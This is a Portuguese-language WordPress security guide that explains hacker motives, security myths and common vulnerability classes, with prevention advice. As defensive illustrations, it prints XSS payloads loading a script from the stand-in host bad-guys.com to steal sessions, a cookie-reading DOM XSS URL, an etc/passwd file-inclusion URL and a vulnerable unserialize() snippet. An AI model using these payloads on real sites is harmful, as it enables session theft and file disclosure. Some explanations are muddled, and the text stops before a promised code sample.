Segurança do WordPress: o guia definitivo

A segurança do WordPress pode ser intimidante, mas não precisa ser. Neste guia abrangente de segurança do WordPress, simplificamos os fundamentos da proteção do seu site WordPress para que qualquer pessoa não técnica possa entender e proteger o site contra ataques de hackers.

Este guia para segurança do WordPress é dividido em 10 seções de fácil digestão. Cada seção o guiará por um aspecto específico da segurança do WordPress. Ao final do guia, você aprenderá os diferentes tipos de vulnerabilidades, os motivos dos hackers e como proteger tudo, desde o seu servidor até os usuários individuais do seu site WordPress.

Vamos mergulhar!

Seção 1: o WordPress é seguro?

O WordPress é seguro? A resposta curta é sim.

O WordPress tem problemas de segurança?

Embora o WordPress em si seja seguro, evitar erros de segurança do WordPress requer um pouco de esforço dos proprietários do site. A verdade é que o maior problema de segurança do WordPress são seus usuários. A maioria dos hacks do WordPress na plataforma pode ser evitada com um pouco de esforço dos proprietários do site.

Não se preocupe, nós ajudamos você. Este guia ensinará tudo o que você precisa saber sobre como manter seu site seguro.

Antes de podermos proteger nossos sites, devemos primeiro entender cinco coisas.

1. Por que hackers atacam sites
2. Os diferentes tipos de hacks do WordPress
3. Tipos específicos de vulnerabilidades do WordPress
4. Como prevenir vulnerabilidades do WordPress
5. Como determinar a gravidade de uma vulnerabilidade

Por que um hacker atacaria meu site?

Esta é uma pergunta comum de segurança do WordPress que você pode fazer quando seu pior pesadelo começar a se tornar realidade. Por que um hacker atacaria meu site? Fique tranquilo, as chances de o ataque ser pessoal são quase nulas. Os hackers têm motivos subjacentes que nada têm a ver com o conteúdo do seu site. Os hackers geralmente não se importam se o seu site é uma página de caridade para cachorros sem-teto ou um site com toneladas de produtos legais à venda.

No entanto, é difícil não se sentir alvo quando uma identidade sem rosto invadiu seu site, causando caos e turbulência. Você se sente estressado e como se a situação estivesse fugindo do seu controle. Você se sente pessoalmente atacado e se pergunta se havia uma maneira de impedir que o ataque acontecesse. Você pode até se perguntar se há algum salvamento dos destroços do seu site.

Então, o que faz um hacker atacar um site? Não tem nada a ver com o seu site, os tópicos que ele cobre ou qualquer coisa assim. Na realidade, os hackers têm como alvo o software que seu site usa para se manter ativo e em execução. Ao hackear esse software, eles podem roubar dados confidenciais do cliente ou até mesmo assumir o controle do seu site WordPress.

Infelizmente, com sua popularidade crescente, o WordPress também se tornou um alvo para hackers. Se um plugin popular do WordPress tem uma vulnerabilidade séria, um hacker tem o potencial de assumir centenas de milhares, senão milhões de sites. Felizmente, a maioria das vulnerabilidades de plug-ins são corrigidas rapidamente por seus desenvolvedores.

Ao conseguir obter informações confidenciais e privadas, os hackers podem vendê-las para obter uma receita ou até mesmo reter o resgate dos dados, essencialmente fazendo com que as pessoas paguem para ter suas informações de volta em boas mãos.

Então, qual é a principal motivação dos hackers?

Para criar fluxo de caixa para si próprios.

A Internet é um lugar lucrativo que oferece a todas as esferas da vida a oportunidade de gerar um salário digno. No entanto, isso não significa que todo mundo faça isso de maneira legal e moralista. Os hackers estão obtendo grandes lucros até mesmo com o menor site.

O dinheiro é toda a motivação de que precisam, mas alguns desfrutam da sensação de poder que obtêm quando conseguem violar um site da Web, mas a grande maioria está no negócio apenas pelo dinheiro.

Seção 2: os 5 principais mitos de segurança do WordPress desmascarados

Antes de pularmos para o restante deste guia de segurança do WordPress, vamos tomar um minuto para desmascarar alguns mitos de segurança do WordPress.

Você encontrará muitos conselhos de segurança do WordPress circulando pela Internet, de pessoas bem-intencionadas que realmente querem ajudar. Infelizmente, alguns desses conselhos são baseados em mitos de segurança do WordPress e não adicionam nenhuma segurança adicional ao seu site WordPress. Na verdade, algumas “dicas” de segurança do WordPress podem aumentar a probabilidade de você se deparar com problemas e conflitos.

Temos muitos mitos de segurança do WordPress para escolher, mas vamos nos concentrar apenas nos cinco principais que temos visto consistentemente em mais de 30.000 tíquetes de suporte. Essas conversas com nossos clientes foram usadas como base para os seguintes critérios para selecionar os principais mitos de segurança do WordPress:

1. A frequência com que o mito foi mencionado.
2. O número de dores de cabeça que o mito causou.
3. A falsa sensação de segurança que o mito proporciona.

1. Você deve ocultar seu URL / wp-admin ou / wp-login (também conhecido como ocultar back-end)

A ideia por trás de esconder o wp-admin é que os hackers não podem hackear o que não encontram. Se o seu URL de login não for o URL padrão do WordPress / wp-admin /, você não está protegido contra ataques de força bruta?

A verdade é que a maioria dos recursos do Hide Backend são simplesmente segurança através da obscuridade, o que não é uma estratégia de segurança WordPress à prova de balas. Embora ocultar o URL do wp-admin do seu back-end possa ajudar a mitigar alguns dos ataques ao seu login, essa abordagem não impedirá todos eles.

Frequentemente recebemos tíquetes de suporte de pessoas que ficam perplexas com a forma como o iThemes Security Pro está relatando tentativas de login inválidas quando ocultam seu login. Isso porque existem outras maneiras de fazer login em seus sites WordPress além de usar um navegador, como usar XML-RPC ou a API REST. Sem mencionar que depois de alterar o URL de login, outro plugin ou tema ainda pode ser vinculado ao novo URL.

Na verdade, o recurso Hide Backend não muda nada. Sim, evita que a maioria dos usuários acesse diretamente o URL de login padrão. Mas depois que alguém insere o URL de login personalizado, é redirecionado de volta para o URL de login padrão do WordPress.

Personalizar o URL de login também é conhecido por causar conflitos. Existem alguns plug-ins, temas ou aplicativos de terceiros que codificam wp-login.php em sua base de código. Portanto, quando um pedaço de software codificado está procurando seusite.com/wp-login.php, ele encontra um erro.

2. Você deve ocultar o nome do tema e o número da versão do WordPress

Se você usar as ferramentas de desenvolvedor do seu navegador, poderá ver rapidamente o nome do tema e o número da versão do WordPress em execução em um site do WordPress. A teoria por trás de ocultar o nome do tema e a versão do WP é que, se os invasores tiverem essas informações, eles terão o plano para invadir o seu site.

Por exemplo, olhando para a imagem acima, você pode ver que este site está usando o Twenty Twenty-One e a versão do WordPress é 5.6.

O problema com esse mito de segurança do WordPress é que não há um cara real atrás de um teclado procurando a combinação perfeita de tema e número de versão do WordPress para atacar. No entanto, existem bots estúpidos que vasculham a Internet em busca de vulnerabilidades conhecidas no código real em execução no seu site, portanto, ocultar o nome do seu tema e o número da versão do WP não o protegerá.

3. Você deve renomear seu diretório wp-content

O diretório wp-content contém seus plug-ins, temas e pasta de uploads de mídia. Isso é uma tonelada de coisas boas e código executável em um único diretório, então é compreensível que as pessoas queiram ser pró-ativas e proteger essa pasta.

Infelizmente, é um mito de segurança do WordPress que alterar o nome do wp-content irá adicionar uma camada extra de segurança ao site. Não vai. Podemos encontrar facilmente o nome do diretório wp-content alterado usando as ferramentas de desenvolvedor do navegador. Na captura de tela abaixo, podemos ver que renomeei o diretório de conteúdo deste site para / test /.

Alterar o nome do diretório não adicionará nenhuma segurança ao seu site, mas pode causar conflitos para plug-ins que possuem o caminho do diretório / wp-content / codificado.

4. Meu site não é grande o suficiente para chamar a atenção de hackers

Esse mito de segurança do WordPress deixa muitos sites vulneráveis ​​a ataques. Mesmo se você for o proprietário de um site minúsculo com baixo tráfego, ainda é crucial para você ser proativo na proteção do seu site.

Mesmo se você for o proprietário de um site minúsculo com baixo tráfego, ainda é crucial para você ser proativo na proteção do seu site.

A verdade é que seu site ou empresa não precisa ser grande para chamar a atenção de um possível invasor. Os hackers ainda veem uma oportunidade de usar seu site como um canal para redirecionar alguns de seus visitantes a sites mal-intencionados, enviar spam de seu servidor de e-mail, espalhar vírus ou até mesmo minerar Bitcoin. Eles pegarão tudo o que puderem.

5. WordPress é uma plataforma insegura

O mito mais prejudicial sobre a segurança do WordPress é que o próprio WordPress é inseguro. Isto simplesmente não é verdade. O WordPress é o sistema de gerenciamento de conteúdo mais popular do mundo, e ele não ficou assim por não levar a segurança a sério.

Seção 3: Hacks do WordPress e vulnerabilidades do WordPress

4 tipos de Hacks para WordPress

Quando se trata de entender a segurança do WordPress, é importante entender

1. Spam de SEO

Outra motivação para um hacker atacar seu site é obter os benefícios do spam de SEO. SEO, ou otimização de mecanismo de pesquisa, é o que os mecanismos de pesquisa usam para indexar ou classificar seu site. Ao usar certas palavras-chave, colocadas estrategicamente em suas páginas da web e postagens de blog, você pode ajudar seu site a ter uma classificação mais elevada nas pesquisas do Google. Isso irá direcionar o tráfego para o seu site e pode ajudá-lo a obter um lucro que valha o seu tempo.

Os hackers sabem tudo sobre SEO e usam isso a seu favor. Quando o seu site for comprometido, os hackers irão instalar um backdoor em seu site. Isso permite que eles controlem suas palavras-chave e o conteúdo do site remotamente. Freqüentemente, eles redirecionam o tráfego do seu site, canalizando-o diretamente para o deles, passando completamente pelo seu.

Isso deixará seu público-alvo confuso e frustrado, destruindo a reputação e a credibilidade do seu site. Os visitantes do seu site serão frequentemente redirecionados para sites que são obviamente golpes e hesitarão em revisitar o seu site no futuro.

Como se isso não bastasse, os hackers que usam essa abordagem fazem seu site parecer ruim para os mecanismos de pesquisa, não apenas para outros seres humanos. Seu site não parecerá mais legítimo e sua classificação irá despencar rapidamente. Sem uma alta classificação nas pesquisas, seu site se tornará um dos milhões que nunca obtém mais do que alguns acessos por mês.

2. Injeções de malware

Muitos hackers atacam seu site com a intenção de infectá-lo com malware. Malware são pequenos pedaços de código que podem ser usados ​​para fazer alterações maliciosas em seu site. Se o seu site for infectado com malware, é importante ser alertado o mais rápido possível.

Cada minuto que o malware permanece no seu site, ele está causando mais danos ao seu site. Quanto mais dano for causado ao seu site, mais tempo você levará para limpá-lo e restaurá-lo. É vital verificar a integridade do seu site, verificando regularmente a existência de malware. É por isso que é fundamental verificar continuamente a integridade do seu site, procurando por malware.

3. Ransomware

Um hacker pode querer atacar seu site para mantê-lo como resgate. Ransomware se refere a quando um hacker assume o controle do seu site e não o libera de volta para você, a menos que você pague uma taxa pesada. O tempo médio de inatividade de um ataque de ransomware é de 9,5 dias. Quanta receita custaria 10 dias sem vendas NENHUMA?

O resgate médio que os hackers estão solicitando aumentou dramaticamente, de US $ 294 em 2015 para bem mais de US $ 13.000 em 2020. Com esses tipos de pagamentos, o negócio do crime online não está diminuindo. Está se tornando cada vez mais crítico proteger e proteger adequadamente seu site à medida que as comunidades criminosas como esta crescem.

4. Desfiguração do site

Alguns hackers podem atacar seu site para se divertir um pouco. Um estilo de hacking que é menos inerentemente malévolo é o dos defacers de sites. Normalmente, são crianças ou jovens adultos que estão apenas começando a brincar com suas habilidades de hacking. Eles fazem hacks como esses como uma forma de praticar e melhorar suas habilidades.

Quando falamos sobre um site sendo desfigurado, pense em graffiti. Os invasores alterarão completamente a aparência do seu site, às vezes de forma divertida ou maluca. Defacers de sites típicos estão fazendo suas ações por diversão ou como uma forma de se exibir. Eles costumam postar fotos de seus delitos, tentando uns aos outros para ganhar o prêmio de melhor desfiguração.

A boa notícia é que essa forma de hackear é menos perigosa para você experimentar. Além disso, como são principalmente adolescentes e outros hackers amadores realizando as defacações, eles são mais fáceis de detectar e remover do seu site quando comparados a outras formas de malware. Eles normalmente podem ser detectados por scanners e removidos rapidamente.

21 vulnerabilidades comuns do WordPress explicadas

Infelizmente, existem vulnerabilidades do WordPress. Vulnerabilidades do WordPress podem existir em seus plug-ins, seus temas e até mesmo no núcleo do WordPress. E uma vez que o WordPress agora capacita quase 40% de todos os sites, a tarefa de entender as vulnerabilidades é ainda mais importante. Resumindo: você deve estar atento à segurança do seu site.

Se você não é um especialista em segurança do WordPress, entender todas as várias vulnerabilidades do WordPress pode ser assustador. Também pode ser difícil tentar entender os diferentes níveis de gravidade de uma vulnerabilidade, juntamente com os riscos da vulnerabilidade do WordPress.

Este guia definirá as 21 vulnerabilidades mais comuns do WordPress, cobrirá como pontuar a gravidade de uma vulnerabilidade do WordPress, dará exemplos de como um hacker pode explorar a vulnerabilidade e mostrará como essas vulnerabilidades podem ser evitadas. Vamos mergulhar.

O que é uma vulnerabilidade do WordPress?

Uma vulnerabilidade do WordPress é uma fraqueza ou falha em um tema, plug-in ou núcleo do WordPress que pode ser explorado por um hacker. Em outras palavras, as vulnerabilidades do WordPress criam um ponto de entrada que um hacker pode usar para realizar atividades maliciosas.

Lembre-se de que os hackers de sites são quase todos automatizados. Por causa disso, os hackers podem facilmente invadir um grande número de sites em praticamente nenhum momento. Os hackers usam ferramentas especiais que fazem a varredura na Internet, em busca de vulnerabilidades conhecidas.

Hackers gostam de alvos fáceis, e ter um site que executa software com vulnerabilidades conhecidas é como entregar a um hacker as instruções passo a passo para invadir seu site WordPress, servidor, computador ou qualquer outro dispositivo conectado à Internet.

Nossos relatórios mensais de resumo de vulnerabilidade do WordPress cobrem todo o núcleo do WordPress divulgado publicamente, plug-in do WordPress e vulnerabilidades de tema. Nessas comparações, compartilhamos o nome do plugin ou tema vulnerável, as versões afetadas e o tipo de vulnerabilidade.

O que é vulnerabilidade de dia zero?

Quando se trata de segurança do WordPress, é importante entender a definição de vulnerabilidade de dia zero. Como a vulnerabilidade foi divulgada ao público, o desenvolvedor tem zero dias para corrigir a vulnerabilidade. E isso pode ter grandes implicações para seus plug-ins e temas.

Normalmente, um pesquisador de segurança descobrirá uma vulnerabilidade e a divulgará em particular para os desenvolvedores da empresa que possuem o software. O pesquisador de segurança e o desenvolvedor concordam que todos os detalhes serão publicados assim que um patch for disponibilizado. Pode haver um pequeno atraso na divulgação da vulnerabilidade após o lançamento do patch para dar a mais pessoas tempo para atualizar as principais vulnerabilidades de segurança.

No entanto, se um desenvolvedor não responder ao pesquisador de segurança ou não fornecer um patch para a vulnerabilidade, o pesquisador pode divulgar publicamente a vulnerabilidade para pressionar o desenvolvedor a emitir um patch.

Revelar publicamente uma vulnerabilidade e aparentemente introduzir um dia zero pode parecer contraproducente. Mas, é a única alavanca que um pesquisador tem para pressionar o desenvolvedor a corrigir a vulnerabilidade.

O Projeto Zero do Google tem diretrizes semelhantes no que diz respeito à divulgação de vulnerabilidades. Eles publicam todos os detalhes da vulnerabilidade após 90 dias. Se a vulnerabilidade foi corrigida ou não.

A vulnerabilidade está aí para qualquer pessoa encontrar. Se um hacker encontrar a vulnerabilidade antes que o desenvolvedor libere um patch, ele se torna o pior pesadelo do usuário final…. Um dia zero explorado ativamente.

O que é uma vulnerabilidade de dia zero ativamente explorada?

Uma vulnerabilidade de dia zero ativamente explorada é exatamente o que parece. É uma vulnerabilidade não corrigida que os hackers têm como alvo, atacam e exploram ativamente.

No final de 2018, os hackers exploravam ativamente uma vulnerabilidade grave do WordPress no plugin WP GDPR Compliance. A exploração permitiu que usuários não autorizados - mais sobre isso na próxima seção - modificassem as configurações de registro do usuário WP e alterassem a nova função de usuário padrão de assinante para administrador.

Esses hackers descobriram essa vulnerabilidade antes do plugin WP GDPR Compliance e dos pesquisadores de segurança. Portanto, qualquer site que tivesse o plugin instalado era uma marca fácil e garantida para os cibercriminosos.

Como se proteger de uma vulnerabilidade de dia zero

A melhor maneira de proteger seu site de uma vulnerabilidade Zero-Day é desativar e remover o software até que a vulnerabilidade seja corrigida. Felizmente, os desenvolvedores do plugin WP GDPR Compliance agiram rápido e lançaram um patch para a vulnerabilidade no dia seguinte à sua divulgação pública.

Vulnerabilidades não corrigidas tornam seu site um alvo fácil para hackers.

Vulnerabilidades não autenticadas vs. autenticadas do WordPress

Existem mais dois termos com os quais você precisa estar familiarizado ao falar sobre as vulnerabilidades do WordPress.

1. Não autenticado - uma vulnerabilidade não autenticada do WordPress significa que qualquer pessoa pode explorar a vulnerabilidade.
2. Autenticado - uma vulnerabilidade autenticada do WordPress significa que requer um usuário conectado para explorar.

Uma vulnerabilidade que requer um usuário autenticado é muito mais difícil para um hacker explorar, especialmente se requer privilégios de nível de administrador. E, se um hacker já tiver em mãos um conjunto de credenciais de administrador, ele realmente não precisa explorar uma vulnerabilidade para causar estragos.

Há uma ressalva. Algumas vulnerabilidades autenticadas requerem apenas recursos de nível de assinante para serem exploradas. Se o seu site permite que qualquer pessoa se registre, realmente não há muita diferença entre isso e uma vulnerabilidade não autenticada.

Quando se trata de vulnerabilidades do WordPress, existem 21 tipos comuns de vulnerabilidades. Vamos cobrir cada um desses tipos de vulnerabilidade do WordPress.

1. Bypass de autenticação

Uma vulnerabilidade de Bypass de autenticação permite que um invasor ignore os requisitos de autenticação e execute tarefas normalmente reservadas para usuários autenticados.

A autenticação é o processo de verificação da identidade de um usuário. O WordPress exige que os usuários digitem um nome de usuário e uma senha para verificar sua identidade.

Exemplo de desvio de autenticação

Os aplicativos verificam a autenticação com base em um conjunto fixo de parâmetros. Um invasor pode modificar esses parâmetros para obter acesso a páginas da Web que normalmente exigem autenticação.

Um exemplo muito básico de algo assim é um parâmetro de autenticação no URL.

 https:/my-website/some-plugint?param=authenticated&param=no

O URL acima possui um parâmetro de autenticação com valor no. Assim, quando visitarmos esta página, seremos apresentados a uma mensagem informando que não estamos autorizados a visualizar as informações nesta página.

No entanto, se a verificação de autenticação foi mal codificada, um invasor pode modificar o parâmetro de autenticação para obter acesso à página privada.

 https:/my-website/some-plugint?param=authenticated&param=yes

Neste exemplo, um hacker pode alterar o valor de autenticação no URL para sim para ignorar o requisito de autenticação para visualizar a página.

Como Prevenir a Prevenção de Desvio de Autenticação

Você pode ajudar a proteger seu site contra vulnerabilidades de autenticação quebrada usando a autenticação de dois fatores.

2. Vulnerabilidade de backdoor

Uma vulnerabilidade de backdoor permite que usuários autorizados e não autorizados contornem as medidas normais de segurança do WordPress e obtenham acesso de alto nível a um computador, servidor, site ou aplicativo.

Exemplo de backdoor

Um desenvolvedor cria um backdoor para que possa alternar rapidamente entre a codificação e o teste do código como um usuário administrador. Infelizmente, o desenvolvedor se esquece de remover a porta dos fundos antes que o software seja lançado ao público.

Se um hacker encontrar a porta dos fundos, ele pode explorar o ponto de entrada para obter acesso de administrador ao software. Agora que o hacker tem acesso de administrador, ele pode fazer todos os tipos de ações maliciosas, como injetar malware ou roubar dados confidenciais.

Como prevenir uma porta dos fundos

Muitos backdoors podem ser resumidos em um problema, configuração incorreta de segurança. Problemas de configuração incorreta de segurança do WordPress podem ser atenuados removendo quaisquer recursos não utilizados no código, mantendo todas as bibliotecas atualizadas e tornando as mensagens de erro mais gerais.

3. Vulnerabilidade de injeção de objeto PHP

Uma vulnerabilidade de injeção de objeto PHP ocorre quando um usuário envia uma entrada que não é higienizada (o que significa que caracteres ilegais não são removidos) antes de ser passada para a função PHP unserialized() .

Exemplo de injeção de objeto PHP

Aqui está um exemplo do mundo real de uma vulnerabilidade de injeção de objeto PHP no plug-in Sample Ads Manager WordPress que foi originalmente relatado por sumofpwn.

O problema é devido a duas chamadas não seguras para unserialize () no arquivo de plugins sam-ajax-loader.php . A entrada é obtida diretamente da solicitação POST, conforme pode ser visto no código a seguir.

 if ( in_array( $action, $allowed_actions ) ) { switch ( $action ) { case 'sam_ajax_load_place': echo json_encode( array( 'success' => false, 'error' => 'Deprecated...' ) ); break; case 'sam_ajax_load_ads': if ( ( isset( $_POST['ads'] ) && is_array( $_POST['ads'] ) ) && isset( $_POST['wc'] ) ) { $clauses = **unserialize( base64_decode( $_POST['wc'] ) )**;

Esse problema pode resultar na entrada e execução de um código malicioso por um invasor.

Como prevenir a injeção de objetos PHP

Não use a função unserialize() com a entrada fornecida pelo usuário, use funções JSON.

4. Vulnerabilidade de script entre sites

Uma vulnerabilidade XSS ou Cross-Site Scripting ocorre quando um aplicativo da web permite que os usuários adicionem código personalizado no caminho da URL. Um invasor pode explorar a vulnerabilidade para executar código malicioso no navegador da vítima, criar um redirecionamento para um site malicioso ou sequestrar uma sessão de usuário.

Existem três tipos principais de XSS, refletidos. armazenado e baseado em DOM

5. Vulnerabilidade de script entre sites refletida

Um Reflected XSS ou Reflected Cross-Site Scripting ocorre quando um script malicioso é enviado em uma solicitação de cliente - uma solicitação feita por você em um navegador - para um servidor e é refletido de volta pelo servidor e executado por seu navegador.

Exemplo refletido de script entre sites

Digamos que yourfavesite.com exija que você esteja conectado para visualizar parte do conteúdo do site. E digamos que este site não codifique as entradas do usuário corretamente.

Um invasor pode tirar proveito dessa vulnerabilidade criando um link malicioso e compartilhando-o com usuários de yourfavesite.com em e-mails e postagens de mídia social.

O invasor usa uma ferramenta de redução de URL para fazer o link malicioso parecer não ameaçador e muito clicável, yourfavesite.com/cool-stuff . Mas, quando você clica no link encurtado, o link completo é executado pelo seu navegador yourfavesite.com/cool-stuff?q=cool-stuff<\script&src=”http://bad-guys.com/passwordstealingcode.js .

Depois de clicar no link, você será levado para yourfavesite.com , e o script malicioso será refletido de volta para o seu navegador, permitindo que o invasor sequestre seus cookies de sessão e conta yourfavesite.com .

Como evitar scripts entre sites refletidos

A regra nº 5 na folha de dicas de prevenção de cross-scripting OWASP é a codificação de URL antes de inserir dados não confiáveis ​​em valores de parâmetro de URL HTML. Esta regra pode ajudar a evitar a criação de uma vulnerabilidade XSS refletida ao adicionar dados não confiáveis ​​ao valor do parâmetro HTTP GET.

<a href="http://www.yourfavesite.com?test=...ENCODE UNTRUSTED DATA BEFORE PUTTING HERE...">link</a >

6. Vulnerabilidade de script entre sites armazenados

Uma vulnerabilidade de Stored XSS ou Stored Cross-Site Scripting permite que hackers injetem código malicioso e o armazene em um servidor de aplicativo da web.

Exemplo de script entre sites armazenados

Um invasor descobre que yourfavesite.com permite que os visitantes incorporem tags HTML na seção de comentários do site. Portanto, o invasor cria um novo comentário:

Ótimo artigo! Confira este outro excelente artigo <script src=”http://bad-guys.com/passwordstealingcode.js> . </script>

Nota: Uma vulnerabilidade XSS refletida exigiria que um visitante clique no link do código malicioso para executar. Um ataque XSS armazenado requer apenas que a página que contém o comentário seja visitada. O código malicioso é executado a cada carregamento de página.

Agora que nosso vilão adicionou o comentário, todos os futuros visitantes desta página serão expostos ao seu script malicioso. O script está hospedado no site do bandido e tem a capacidade de sequestrar cookies de sessão de visitantes e contas yourfavesite.com .

Como evitar scripts entre sites armazenados

A regra nº 1 na folha de dicas de prevenção de cross-scripting OWASP é a codificação HTML antes de adicionar dados não confiáveis ​​aos elementos HTML.

 <body> ...ENCODE UNTRUSTED DATA BEFORE PUTTING HERE... </body>

 <div> ...ENCODE UNTRUSTED DATA BEFORE PUTTING HERE... </div>

Codificar os caracteres a seguir para evitar a mudança para qualquer contexto de execução, como script, estilo ou manipuladores de eventos. O uso de entidades hexadecimais é recomendado na especificação.

 & --> &amp; < --> &lt; > --> &gt; " --> &quot; ' --> &#x27;

7. Vulnerabilidade de script entre sites baseada em modelo de objeto de documento

Uma vulnerabilidade XSS baseada em DOM ou Document Object-Based Cross-Site Scripting ocorre quando o script do lado do cliente de um site grava dados fornecidos pelo usuário no Document Object Model (DOM). O site então lê a data do usuário no DOM e a envia para o navegador do visitante.

Se os dados fornecidos pelo usuário não forem tratados adequadamente, um invasor pode injetar um código malicioso que será executado quando o site ler o código do DOM.

Nota: XSS refletido e armazenado são problemas do lado do servidor, enquanto o XSS baseado em DOM é um problema do cliente (navegador).

Exemplo de script entre sites baseado em modelo de objeto de documento

Uma maneira comum de explicar um ataque DOM XSS é uma página de boas-vindas personalizada. Depois de criar uma conta, digamos que yourfavesite.com você seja redirecionado para uma página de boas-vindas personalizada para recebê-lo por nome usando o código abaixo. E o nome do usuário é codificado no URL.

 <HTML> <TITLE>Welcome!</TITLE> Hi <SCRIPT> var pos=document.URL.indexOf("name=")+8; document.write(document.URL.substring(pos,document.URL.length)); </SCRIPT> <BR> Welcome to yourfavesite.com! … </HTML>

Portanto, teríamos um URL de yourfavesite.com/account?name=yourname .

Um invasor pode realizar um ataque XSS baseado em DOM enviando o seguinte URL para o novo usuário:

 http://yourfavesite.com/account?name=<script>alert(document.cookie)</script>

Quando o novo usuário clica no link, seu navegador envia uma solicitação de:

 /account?name=<script>alert(document.cookie)</script>

para bad-guys.com . O site responde com a página que contém o código Javascript acima.

O navegador do novo usuário cria um objeto DOM para a página, no qual o objeto document.location contém a string:

 http://www.bad-guys.com/account?name=<script>alert(document.cookie)</script>

O código original na página não espera que o parâmetro padrão contenha marcação HTML, ecoando a marcação na página. Em seguida, o navegador do novo usuário renderizará a página e executará o script do invasor:

 alert(document.cookie)

Como evitar scripts entre sites com base em DOM

A regra nº 1 na folha de dicas de prevenção de scripts entre sites OWASP Dom é escapar do HTML. Então, o JS escapa antes de adicionar dados não confiáveis ​​ao subcontexto HTML dentro do contexto de execução.

Métodos HTML perigosos de exemplo:

Atributos

 element.innerHTML = "<HTML> Tags and markup"; element.outerHTML = "<HTML> Tags and markup";

Métodos

 document.write("<HTML> Tags and markup"); document.writeln("<HTML> Tags and markup");

Para fazer atualizações dinâmicas em HTML no DOM safe, o OWASP recomenda:

1. Codificação HTML, e então
2. JavaScript codificando todas as entradas não confiáveis, conforme mostrado nestes exemplos:

 element.innerHTML = "<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>"; element.outerHTML = "<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>";

 document.write("<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>"); document.writeln("<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>");

8. Vulnerabilidade de falsificação de solicitação entre sites

Uma vulnerabilidade CSRF ou Cross-Site Request Forgery ocorre quando um criminoso cibernético engana um usuário para que ele execute ações indesejadas. O invasor falsifica a solicitação do usuário para um aplicativo.

Exemplo de falsificação de solicitação entre sites

Em nosso resumo de vulnerabilidades do WordPress de janeiro de 2020, relatamos a vulnerabilidade Cross-Site Request Forgery encontrada no plug-in Code Snippets. (O plugin foi corrigido rapidamente na versão 2.14.0)

A falta de proteção CRSF do plugin permitiu que qualquer um falsificasse uma solicitação em nome de um administrador e injetasse código executável em um site vulnerável. Um invasor pode ter aproveitado essa vulnerabilidade para executar código mal-intencionado e até mesmo realizar um controle completo do site.

Como evitar falsificação de solicitação entre sites

A maioria das estruturas de codificação tem defesas de token sincronizadas integradas para proteger contra CSRF e devem ser usadas.

Existem também componentes externos, como o CSRF Protector Project, que podem ser usados ​​para proteger as vulnerabilidades do PHP e do Apache CSRF.

9. Vulnerabilidade de falsificação de solicitação do lado do servidor

Uma vulnerabilidade SSRF ou Server-Site Request Forger permite que um invasor engane um aplicativo do lado do servidor para fazer solicitações HTTP a um domínio arbitrário de sua escolha.

Exemplo de falsificação de solicitação do lado do servidor

Uma vulnerabilidade SSRF pode ser explorada para desencadear um ataque Reflected Cross-Site Scripting. Um invasor pode obter um script malicioso em bad-guys.com e exibi-lo a todos os visitantes de um site.

Como evitar falsificação de solicitação do lado do servidor

A primeira etapa para mitigar vulnerabilidades de SSRF é validar as entradas. Por exemplo, se o seu servidor depende de URLs fornecidos pelo usuário para buscar arquivos diferentes, você deve validar o URL e permitir apenas hosts de destino nos quais você confia.

Para obter mais informações sobre a prevenção de SSRF, verifique a folha de dicas OWASP.

10. Vulnerabilidade de escalonamento de privilégios

Uma vulnerabilidade de escalonamento de privilégio permite que um invasor execute tarefas que normalmente requerem privilégios de nível mais alto.

Exemplo de escalonamento de privilégio

Em nosso resumo de vulnerabilidades do WordPress de novembro de 2020, relatamos uma vulnerabilidade de escalonamento de privilégios encontrada no plug-in Ultimate Member (a vulnerabilidade foi corrigida na versão 2.1.12).

Um invasor pode fornecer um parâmetro de matriz para o meta de usuário wp_capabilities que define a função de um usuário. Durante o processo de registro, os detalhes do registro enviados foram passados ​​para a função update_profile , e quaisquer respectivos metadados enviados, independentemente do que foi enviado, seriam atualizados para esse usuário recém-registrado.

A vulnerabilidade basicamente permitiu que um novo usuário solicitasse o administrador ao se registrar.

Como Prevenir o Escalonamento de Privilégios

O iThemes Security Pro pode ajudar a proteger seu site contra o controle de acesso quebrado, restringindo o acesso do administrador a uma lista de dispositivos confiáveis.

11. Vulnerabilidade de execução remota de código

Uma vulnerabilidade RCE ou Remote Code Execution permite que um invasor acesse e faça alterações e até mesmo assuma o controle de um computador ou servidor.

Exemplo de execução remota de código

Em 2018, a Microsoft divulgou uma vulnerabilidade de execução remota de código encontrada no Excel.

Um invasor que explorar com êxito a vulnerabilidade pode executar código arbitrário no contexto do usuário atual. Se o usuário atual estiver conectado com direitos de usuário administrativo, um invasor poderá assumir o controle do sistema afetado. Um invasor pode então instalar programas; visualizar, alterar ou excluir dados; ou crie novas contas com direitos de usuário totais. Os usuários cujas contas são configuradas com menos direitos de usuário no sistema podem ser menos afetados do que os usuários que operam com direitos de usuário administrativo.

Como prevenir a execução remota de código

A maneira mais fácil de mitigar uma vulnerabilidade RCE é validar a entrada do usuário, filtrando e removendo quaisquer caracteres indesejados.

Nossa empresa controladora, Liquid Web, tem um ótimo artigo sobre como prevenir a execução remota de código.

14. Vulnerabilidade de inclusão de arquivo

Uma vulnerabilidade de inclusão de arquivo ocorre quando um aplicativo da web permite que o usuário envie entrada em arquivos ou faça upload de arquivos para o servidor.

Existem dois tipos de vulnerabilidades de inclusão de arquivo, local e remoto.

15. Vulnerabilidade de inclusão de arquivo local

Uma vulnerabilidade LFI ou de inclusão de arquivo local permite que um invasor leia e, às vezes, execute arquivos no servidor de um site.

Exemplo de inclusão de arquivo local

Vamos dar outra olhada em yourfavesite.com , onde os caminhos passados ​​para include instruções não são devidamente limpos. Por exemplo, vamos dar uma olhada no URL abaixo.

 yourfavesite.com/module.php?file=example.file

É possível que um invasor altere o parâmetro de URL para acessar um arquivo arbitrário no servidor.

 yourfavesite.com/module.php?file=etc/passwd

Alterar o valor do arquivo no URL pode permitir que um invasor visualize o conteúdo do arquivo psswd.

Como prevenir a inclusão de arquivos locais

Crie uma lista de arquivos permitidos que a página pode incluir e, em seguida, use um identificador para acessar o arquivo selecionado. Em seguida, bloqueie qualquer solicitação que contenha um identificador inválido.

16. Vulnerabilidade de inclusão de arquivo remoto

Uma vulnerabilidade de RFI ou inclusão de arquivo remoto permite que um invasor inclua um arquivo, geralmente explorando mecanismos de “inclusão de arquivo dinâmico” implementados no aplicativo de destino.

Exemplo de inclusão de arquivo remoto

O WordPress Plugin WP com Spritz foi fechado no repositório do WordPress.org porque tinha uma vulnerabilidade RFI.

Abaixo está o código-fonte da vulnerabilidade:

